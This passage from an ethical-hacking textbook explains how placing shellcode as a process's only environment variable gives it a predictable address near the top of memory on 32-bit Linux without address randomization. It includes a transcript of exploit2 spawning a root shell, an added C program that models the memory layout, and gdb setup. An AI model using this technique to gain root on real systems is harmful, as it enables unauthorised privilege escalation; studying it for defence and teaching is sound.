$ ./exploit2
[***] using address: 0xbfffffc2
sh-2.05b# whoami
root
sh-2.05b# exit
exit
$exit
Why did this work? It turns out that a Turkish hacker called Murat published this
technique, which relies on the fact that on the 32-bit Linux kernels of the time every process,
whatever ELF binary it runs, has its user address space end at the same address, 0xbfffffff.
(Modern kernels randomize the stack base, so this fixed top of memory only holds if address
space layout randomization is disabled.) Remember from Chapter 6, the environment and
arguments are stored up in this area. Just below them is the stack. Let's look at the upper
process memory in detail:
Gray Hat Hacking: The Ethical Hacker's Handbook
162
Notice how the end of memory is terminated with NULL values, then comes the program
name, then the environment variables, and finally the arguments. The following line of
code from exploit2.c sets the value of the environment for the process as the shellcode:
char *env[] = { shellcode, NULL };
That places the beginning of the shellcode at a precise, predictable location:
Addr of shellcode = 0xbffffffa - length(program name) - length(shellcode)
The constant already accounts for the four NULL bytes at 0xbffffffc through 0xbfffffff, for the
NUL that terminates the program name just below them, and for the NUL that terminates the
shellcode string below that; the shellcode itself occupies the length(shellcode) bytes below
that second NUL.
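The layout and the formula above, worked through as an added C example (not the book's code and not exploit2.c): it fills a buffer the way execve fills the last bytes of process memory, checks that the modelled address of env[0] equals 0xbffffffa - length(program name) - length(shellcode), and shows why the environment handed to the victim must contain nothing but the shellcode. The program name "./exploit2", the victim's arguments, the 46-byte run of 'A' bytes standing in for shellcode, and the top-of-memory constant of a 32-bit kernel without stack randomization are assumptions made for the example.

```c
/* top_of_stack.c: model of the string area at the top of process memory
 * described above (NULL bytes, program name, environment, arguments) and of
 * the formula addr(shellcode) = 0xbffffffa - len(program name) - len(shellcode).
 * Added example, not code from the book or exploit2.c; the program names,
 * arguments and the 46-byte 'A' payload are constructed stand-ins. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define USER_TOP 0xc0000000UL  /* one past 0xbfffffff: 32-bit Linux, no ASLR */

/* The book's formula: 0xbffffffa is USER_TOP minus the four trailing NULL
 * bytes, the NUL after the program name and the NUL after the shellcode. */
uint32_t predict_shellcode_addr(const char *progname, size_t shellcode_len)
{
    return (uint32_t)(USER_TOP - 4 - 1 - 1 - strlen(progname) - shellcode_len);
}

/* Lay strings out the way execve does, treating buf as the last len bytes
 * of memory ending at top. Top down: four NULL bytes, the program name, the
 * environment strings (last entry highest, env[0] lowest), then the argument
 * strings. Returns the simulated address of env[0], 0 if buf is too small. */
uint32_t lay_out_top_of_stack(unsigned char *buf, size_t len, uint32_t top,
                              const char *progname,
                              const char *const *envp, size_t envc,
                              const char *const *argv, size_t argc)
{
    size_t p = len, n;
    uint32_t env0 = 0;

    memset(buf, 0, len);
    if (p < 4) return 0;
    p -= 4;                                   /* NULL word at the very top */
    n = strlen(progname) + 1;
    if (p < n) return 0;
    memcpy(buf + (p -= n), progname, n);
    for (size_t i = envc; i-- > 0; ) {        /* env[envc-1] first, env[0] last */
        n = strlen(envp[i]) + 1;
        if (p < n) return 0;
        memcpy(buf + (p -= n), envp[i], n);
        env0 = (uint32_t)(top - len + p);
    }
    for (size_t i = argc; i-- > 0; ) {        /* arguments sit below the environment */
        n = strlen(argv[i]) + 1;
        if (p < n) return 0;
        memcpy(buf + (p -= n), argv[i], n);
    }
    return env0;
}

/* The check the text performs with gdb: are the payload bytes at addr? */
int payload_found_at(const unsigned char *buf, size_t len, uint32_t top,
                     uint32_t addr, const char *payload)
{
    size_t plen = strlen(payload);
    if (addr < top - len || (size_t)addr + plen > top) return 0;
    return memcmp(buf + (addr - (top - len)), payload, plen) == 0;
}

/* Scenario from the text: the environment holds only the shellcode. Returns 1
 * if the modelled address of env[0] equals the formula and the payload is there. */
int model_matches_formula(void)
{
    char payload[47];
    unsigned char mem[256];
    const char *progname = "./exploit2";
    const char *envp[] = { payload };             /* char *env[] = { shellcode, NULL }; */
    const char *argv[] = { "./target", "AAAA" };  /* hypothetical victim argv */

    memset(payload, 'A', 46); payload[46] = '\0';
    uint32_t predicted = predict_shellcode_addr(progname, 46);
    uint32_t modelled = lay_out_top_of_stack(mem, sizeof mem, USER_TOP,
                                             progname, envp, 1, argv, 2);
    return predicted == modelled &&
           payload_found_at(mem, sizeof mem, USER_TOP, predicted, payload);
}

/* Why the environment must hold nothing but the shellcode: a variable added
 * after it is placed above it and pushes env[0] down by strlen(extra) + 1.
 * Returns that displacement in bytes. */
uint32_t displacement_with_extra_var(const char *extra)
{
    char payload[47];
    unsigned char mem[256];
    const char *progname = "./exploit2";
    const char *envp[] = { payload, extra };

    memset(payload, 'A', 46); payload[46] = '\0';
    uint32_t modelled = lay_out_top_of_stack(mem, sizeof mem, USER_TOP,
                                             progname, envp, 2, NULL, 0);
    return predict_shellcode_addr(progname, 46) - modelled;
}

int main(void)
{
    printf("formula 0x%08x  model matches %d  shift with X=1: %u bytes\n",
           (unsigned)predict_shellcode_addr("./exploit2", 46), model_matches_formula(),
           (unsigned)displacement_with_extra_var("X=1"));
    return 0;
}
```

Compile with gcc and run it: a 10-character program name and a 46-byte payload give 0xbfffffc2, and appending a single extra variable such as X=1 moves the payload four bytes lower, which is exactly why the exploit passes an environment of its own instead of inheriting the shell's. On a current 64-bit kernel the real addresses differ (different layout and ASLR), so the model works from the book's constant rather than from the running process.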
Let's verify that with gdb. First, to assist with the debugging, place a \xcc at the beginning
of the shellcode: \xcc is the x86 int3 breakpoint instruction, so the process traps into the
debugger the moment the shellcode starts executing, and the address gdb reports is the start of
the shellcode. Next recompile the program and load it into the debugger:
# gcc -o exploit2 exploit2.c